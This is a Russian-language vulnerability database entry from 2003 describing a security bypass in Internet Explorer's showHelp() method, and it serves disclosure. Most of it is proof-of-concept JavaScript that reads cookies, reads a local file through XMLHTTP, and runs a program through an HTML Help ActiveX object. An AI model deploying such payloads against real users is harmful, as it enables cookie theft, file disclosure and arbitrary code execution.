| Дата публикации: | 10.02.2003 |
| Всего просмотров: | 1211 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Ранее мы сообщали о выходе патче к IE, устраняющем уязвимость в методе showHelp(). Сообщается, что ограничения безопасности не работают, когда showHelp вызывается с аргументом File. Как уже говорилось, в результате атакующий может выполнять произвольный код на уязвимой системе. Вот несколько примеров.
1. Чтение куки: showHelp("file:");showHelp("http://www.google.com/");
showHelp("javascript:alert(document.cookie)");
2. Чтение файла с:\text.txt
showHelp("file:");showHelp("res://shdoclc.dll/about.dlg");
showHelp("javascript:try{c=new ActiveXObject('Msxml2.XMLHTTP')}\
catch(e){c=new ActiveXObject('Microsoft.XMLHTTP')};c.open('GET',\
'file://c:/test.txt',false);c.send(null);alert(c.responseText)");
3. Еще один способ чтения файла с:\text.txt:
showHelp("file:");showHelp("file://c:/test.txt");
showHelp("javascript:alert(document.body.innerText)");
4. Запуск Winmine:
showHelp("file:");showHelp("iexplore.chm");showHelp("res:");
showHelp("javascript:location='mk:@MSITStore:C:'");
showHelp("javascript:document.write('<object id=c classid=\
clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\\u003E<param na\
me=Command value=ShortCut\\u003E\<param name=Item1 value=,\
winmine,\\u003E</object\\u003E');c.Click();");
|